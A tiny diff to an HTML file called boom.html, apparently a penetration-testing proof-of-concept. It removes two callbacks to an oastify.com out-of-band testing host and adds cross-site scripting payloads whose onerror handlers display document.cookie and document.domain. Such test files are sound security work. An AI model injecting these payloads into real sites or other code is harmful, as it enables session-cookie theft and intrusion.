--- a/boom.html
+++ b/boom.html
@@ -1,6 +1,6 @@
 <html>
   <body>
-    <img src="http://y21n4xncuiwn19xh2eth72ceh5n9bdz2.oastify.com" />
-    <script>new Image().src="http://y21n4xncuiwn19xh2eth72ceh5n9bdz2.oastify.com/js";</script>
+    <img src="x" onerror=prompt(document.cookie) />
+    <img src="x" onerror=prompt(document.domain) />
   </body>
 </html>
